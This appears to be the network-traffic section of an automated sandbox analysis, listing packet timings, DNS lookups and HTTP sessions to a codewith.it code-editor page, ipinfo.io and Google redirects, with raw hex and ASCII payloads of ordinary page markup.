                                                  Aug 23, 2024 19:16:22.915189981 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.915314913 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:22.920376062 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.925729036 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.925759077 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.925795078 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:22.925806999 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.925883055 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:22.930280924 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.935126066 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.935175896 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.935183048 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:22.935195923 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.935240030 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:22.939408064 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.943409920 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.943440914 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.943465948 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:22.943475008 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.943794012 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:22.947449923 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.951608896 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.951638937 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.951667070 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:22.951673985 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.951715946 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:22.951723099 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.955744028 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.955801964 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:22.955809116 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.959410906 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.959470034 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:22.959481001 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.963614941 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.963681936 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:22.963694096 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:23.012603998 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.010200977 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.010386944 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.010688066 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.010795116 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.010812998 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.010843039 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.010880947 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.010934114 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.010950089 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.011517048 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.011547089 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.011565924 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.011570930 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.011626005 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.011632919 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.012459040 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.012501001 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.012528896 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.012558937 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.012583017 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.012590885 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.013331890 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.013355970 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.013391972 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.013418913 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.013427019 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.013432980 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.013540030 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.015675068 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.015726089 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.015753984 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.015759945 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.015764952 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.015850067 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.016014099 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.016100883 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.016145945 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.016452074 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.016489029 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.017064095 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.017092943 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.017118931 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.017118931 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.017127037 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.017426014 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.017457008 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.017513990 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.017522097 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.017573118 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.017915010 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.017975092 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.017981052 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.018300056 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.018394947 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.018402100 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.018655062 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.018683910 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.018717051 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.018723965 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.019092083 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.019098043 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.019619942 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.019680023 CEST49740443192.168.2.4216.58.212.164
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Aug 23, 2024 19:16:16.346438885 CEST5038153192.168.2.41.1.1.1
                                                  Aug 23, 2024 19:16:16.406255007 CEST53503811.1.1.1192.168.2.4
                                                  Aug 23, 2024 19:16:18.484137058 CEST5524853192.168.2.41.1.1.1
                                                  Aug 23, 2024 19:16:18.492991924 CEST53552481.1.1.1192.168.2.4
                                                  Aug 23, 2024 19:16:19.328125954 CEST6508653192.168.2.41.1.1.1
                                                  Aug 23, 2024 19:16:19.399097919 CEST53650861.1.1.1192.168.2.4
                                                  Aug 23, 2024 19:16:20.352257013 CEST6224053192.168.2.41.1.1.1
                                                  Aug 23, 2024 19:16:20.360259056 CEST53622401.1.1.1192.168.2.4
                                                  Aug 23, 2024 19:16:21.019259930 CEST5957353192.168.2.41.1.1.1
                                                  Aug 23, 2024 19:16:21.027192116 CEST53595731.1.1.1192.168.2.4
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Aug 23, 2024 19:16:16.346438885 CEST192.168.2.41.1.1.10x1fe2Standard query (0)codewith.itA (IP address)IN (0x0001)false
                                                  Aug 23, 2024 19:16:18.484137058 CEST192.168.2.41.1.1.10xf202Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                  Aug 23, 2024 19:16:19.328125954 CEST192.168.2.41.1.1.10xdb53Standard query (0)www.fuhnwijude.comA (IP address)IN (0x0001)false
                                                  Aug 23, 2024 19:16:20.352257013 CEST192.168.2.41.1.1.10x848fStandard query (0)google.comA (IP address)IN (0x0001)false
                                                  Aug 23, 2024 19:16:21.019259930 CEST192.168.2.41.1.1.10x22b9Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Aug 23, 2024 19:16:16.406255007 CEST1.1.1.1192.168.2.40x1fe2No error (0)codewith.it188.114.97.3A (IP address)IN (0x0001)false
                                                  Aug 23, 2024 19:16:16.406255007 CEST1.1.1.1192.168.2.40x1fe2No error (0)codewith.it188.114.96.3A (IP address)IN (0x0001)false
                                                  Aug 23, 2024 19:16:18.492991924 CEST1.1.1.1192.168.2.40xf202No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                  Aug 23, 2024 19:16:19.399097919 CEST1.1.1.1192.168.2.40xdb53No error (0)www.fuhnwijude.comfuhnwijude.comCNAME (Canonical name)IN (0x0001)false
                                                  Aug 23, 2024 19:16:19.399097919 CEST1.1.1.1192.168.2.40xdb53No error (0)fuhnwijude.com198.20.110.106A (IP address)IN (0x0001)false
                                                  Aug 23, 2024 19:16:20.360259056 CEST1.1.1.1192.168.2.40x848fNo error (0)google.com142.250.185.78A (IP address)IN (0x0001)false
                                                  Aug 23, 2024 19:16:21.027192116 CEST1.1.1.1192.168.2.40x22b9No error (0)www.google.com216.58.212.164A (IP address)IN (0x0001)false
                                                  • codewith.it
                                                  • ipinfo.io
                                                  • www.fuhnwijude.com
                                                  • www.google.com
                                                  • google.com
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.449737142.250.185.78804820C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 23, 2024 19:16:20.366395950 CEST247OUTGET / HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip
                                                  User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G955U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36
                                                  Connection: Keep-Alive
                                                  Host: google.com
                                                  Aug 23, 2024 19:16:21.018255949 CEST804INHTTP/1.1 301 Moved Permanently
                                                  Location: http://www.google.com/
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-kLf5I84YGSpohA1bDwilMg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                  Permissions-Policy: unload=()
                                                  Date: Fri, 23 Aug 2024 17:16:20 GMT
                                                  Expires: Sun, 22 Sep 2024 17:16:20 GMT
                                                  Cache-Control: public, max-age=2592000
                                                  Server: gws
                                                  Content-Length: 219
                                                  X-XSS-Protection: 0
                                                  X-Frame-Options: SAMEORIGIN
                                                  Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.google.com/">here</A>.</BODY></HTML>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.449739216.58.212.164804820C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 23, 2024 19:16:21.033205032 CEST251OUTGET / HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip
                                                  User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G955U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36
                                                  Connection: Keep-Alive
                                                  Host: www.google.com
                                                  Aug 23, 2024 19:16:21.712377071 CEST935INHTTP/1.1 302 Found
                                                  Location: https://www.google.com/?gws_rd=ssl
                                                  Cache-Control: private
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-f_yy60SEJRGAhctr6iS7kQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                  Permissions-Policy: unload=()
                                                  Date: Fri, 23 Aug 2024 17:16:21 GMT
                                                  Server: gws
                                                  Content-Length: 231
                                                  X-XSS-Protection: 0
                                                  X-Frame-Options: SAMEORIGIN
                                                  Set-Cookie: AEC=AVYB7cpAq0GIpRy9NZo9DvJvUBBN_YmsGsCKv3vpUtvLYDCsdqWAVvUU9g; expires=Wed, 19-Feb-2025 17:16:21 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                  Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3f 67 77 73 5f 72 64 3d 73 73 6c 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/?gws_rd=ssl">here</A>.</BODY></HTML>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.449730188.114.97.34434820C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-08-23 17:16:17 UTC256OUTGET /p/zNgG4G HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip
                                                  Host: codewith.it
                                                  User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G955U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36
                                                  Connection: Keep-Alive
                                                  2024-08-23 17:16:18 UTC788INHTTP/1.1 200 OK
                                                  Date: Fri, 23 Aug 2024 17:16:18 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  pragma: no-cache
                                                  vary: Accept-Encoding,User-Agent
                                                  set-cookie: PHPSESSID=e507afa8d2b5f20e6dfbba9571228bb7; path=/
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZL7YYbRVF%2B3WlUQGM1vbMgl6mMXF3YAYLcIw9gt%2BTrGS9jbgz%2BFP4uvKdh6aVYgrbx%2F2PsOw8rVh4YbKsjbB%2FbI40QOcMLcFn%2FJnafpH7kJx%2BLKog6xhUGEa7ShUhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8b7cbfe088fc8c84-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-08-23 17:16:18 UTC581INData Raw: 37 63 39 64 0d 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 41 47 4f 53 54 4f 20 62 79 20 40 70 73 67 74 72 61 6e 73 70 6f 72 74 65 73 62 72 20 2d 20 43 6f 64 65 77 69 74 68 2e 69 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e
                                                  Data Ascii: 7c9d<!DOCTYPE html><html lang="en"> <head> <title>AGOSTO by @psgtransportesbr - Codewith.it</title> <meta name="viewport" content="width=device-width, user-scalable=no"> <meta charset="UTF-8"> <meta name="description" conten
                                                  2024-08-23 17:16:18 UTC1369INData Raw: 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 09 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 61 74 65 67 6f 72 79 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 20 64 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 64 65 77 69 74 68 2e 69 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 64 65 77 69 74 68 2e 69 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 55 74 69 6c 69 74 79 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d
                                                  Data Ascii: nguage" content=""><meta name="category" content="web development"><meta property="og:title" content="Codewith.it" /><meta property="og:site_name" content="Codewith.it" /><meta property="og:type" content="Utility" /><meta property="og:url" content=
                                                  2024-08-23 17:16:18 UTC1369INData Raw: 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 47 2d 33 46 4d 4a 58 5a 42 47 45 50 27 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 75 6e 70 6b 67 2e 63 6f 6d 2f 6d 6f 6e 61 63 6f 2d 65 64 69 74 6f 72 40 6c 61 74 65 73 74 2f 6d 69 6e 2f 76 73 2f 6c 6f 61 64 65 72 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 69 63 6f 6e 3f 66 61 6d 69 6c 79 3d 4d 61 74 65 72 69 61 6c 2b 49 63 6f 6e 73 2b 4f 75 74 6c
                                                  Data Ascii: (arguments);} gtag('js', new Date()); gtag('config', 'G-3FMJXZBGEP');</script> <script src="https://unpkg.com/monaco-editor@latest/min/vs/loader.js"></script> <link href="https://fonts.googleapis.com/icon?family=Material+Icons+Outl
                                                  2024-08-23 17:16:18 UTC1369INData Raw: 3e 0a 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 27 74 6f 70 62 61 72 2d 69 63 6f 6e 20 6d 69 63 6e 27 20 74 69 74 6c 65 3d 27 53 68 6f 77 2f 48 69 64 65 20 70 72 65 76 69 65 77 27 20 69 64 3d 27 48 69 64 65 50 72 65 76 69 65 77 42 74 6e 27 3e 0a 20 20 20 20 20 20 70 72 65 76 69 65 77 0a 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 27 74 6f 70 62 61 72 2d 69 63 6f 6e 20 6d 69 63 6e 20 65 62 75 74 74 6f 6e 27 20 74 69 74 6c 65 3d 27 43 6f 6d 6d 61 6e 64 20 6c 69 73 74 27 20 64 61 74 61 2d 70 61 6e 65 6c 3d 27 63 6d 64 50 61 6e 65 6c 27 3e 0a 20 20 20 20 20 20 6b 65 79 62 6f 61 72 64 0a 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 27 74 6f 70 62
                                                  Data Ascii: > <button class='topbar-icon micn' title='Show/Hide preview' id='HidePreviewBtn'> preview </button> <button class='topbar-icon micn ebutton' title='Command list' data-panel='cmdPanel'> keyboard </button> <button class='topb
                                                  2024-08-23 17:16:18 UTC1369INData Raw: 72 2d 63 6f 6c 20 66 6c 65 78 2d 63 65 6e 74 65 72 20 72 65 6c 61 74 69 76 65 27 3e 0a 20 20 20 20 3c 66 6f 72 6d 20 69 64 3d 22 73 65 61 72 63 68 46 6f 72 6d 22 20 6d 65 74 68 6f 64 3d 27 70 6f 73 74 27 3e 0a 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 27 74 65 78 74 27 20 63 6c 61 73 73 3d 27 74 6f 70 62 61 72 2d 69 6e 70 75 74 27 20 69 64 3d 27 73 65 61 72 63 68 42 61 72 27 20 6e 61 6d 65 3d 27 73 65 61 72 63 68 76 61 6c 75 65 27 20 6d 61 78 6c 65 6e 67 74 68 3d 22 34 30 22 20 69 64 3d 27 27 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 27 43 65 72 63 61 2e 2e 2e 27 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 27 6f 66 66 27 20 74 69 74 6c 65 3d 27 53 65 61 72 63 68 20 73 6f 6d 65 74 68 69 6e 67 27 3e 0a 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c
                                                  Data Ascii: r-col flex-center relative'> <form id="searchForm" method='post'> <input type='text' class='topbar-input' id='searchBar' name='searchvalue' maxlength="40" id='' placeholder='Cerca...' autocomplete='off' title='Search something'> <button cl
                                                  2024-08-23 17:16:18 UTC1369INData Raw: 74 74 70 73 3a 2f 2f 63 6f 64 65 77 69 74 68 2e 69 74 2f 64 6f 63 73 3f 77 3d 63 73 73 5f 77 69 64 74 68 27 20 74 69 74 6c 65 3d 27 56 69 73 75 61 6c 69 7a 7a 61 20 72 65 66 65 72 65 6e 7a 61 27 20 74 61 72 67 65 74 3d 27 5f 62 6c 61 6e 6b 27 3e 77 69 64 74 68 3c 2f 61 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 73 6d 61 6c 6c 20 6d 6c 2d 32 27 3e 49 6d 70 6f 73 74 61 20 6c 61 20 6c 61 72 67 68 65 7a 7a 61 20 64 69 20 75 6e 20 65 6c 65 6d 65 6e 74 6f 20 48 54 4d 4c 3c 2f 73 70 61 6e 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 77 69 74 68 2e 69 74 2f 64 6f 63 73 3f 77 3d 68 74 6d 6c 5f 64 69 76 27 20 74 69 74 6c 65 3d 27 56 69 73 75 61 6c 69 7a 7a 61 20 72 65 66 65 72 65 6e 7a 61 27 20 74 61 72 67 65 74 3d 27
                                                  Data Ascii: ttps://codewith.it/docs?w=css_width' title='Visualizza referenza' target='_blank'>width</a><span class='small ml-2'>Imposta la larghezza di un elemento HTML</span></li><li><a href='https://codewith.it/docs?w=html_div' title='Visualizza referenza' target='
                                                  2024-08-23 17:16:18 UTC1369INData Raw: 3c 2f 6c 69 3e 0a 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 27 65 78 70 6c 6f 72 65 48 65 61 64 65 72 27 3e 0a 20 20 20 20 3c 68 33 3e 0a 20 20 20 20 20 20 45 78 70 6c 6f 72 65 20 20 20 20 3c 2f 68 33 3e 20 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 27 65 78 70 6c 6f 72 65 27 20 74 69 74 6c 65 3d 27 65 78 70 6c 6f 72 65 20 70 72 6f 6a 65 63 74 73 20 61 6e 64 20 66 69 6c 65 73 27 3e 0a 20 20 20 20 20 20 46 69 6e 64 20 69 6e 73 70 69 72 61 74 69 6f 6e 3c 2f 61 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 27 64 69 76 69 64 65 72 20 67 72 6f 73 73 27 20 69 64 3d 22 66 69 6c 65 64 69 76 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 27 66 69 6c 65 73 62 72 6f 77 73 65 72 27 20
                                                  Data Ascii: </li> </ul> </div> <div class='exploreHeader'> <h3> Explore </h3> <a href='explore' title='explore projects and files'> Find inspiration</a> </div> <div class='divider gross' id="filediv"> <div class='filesbrowser'
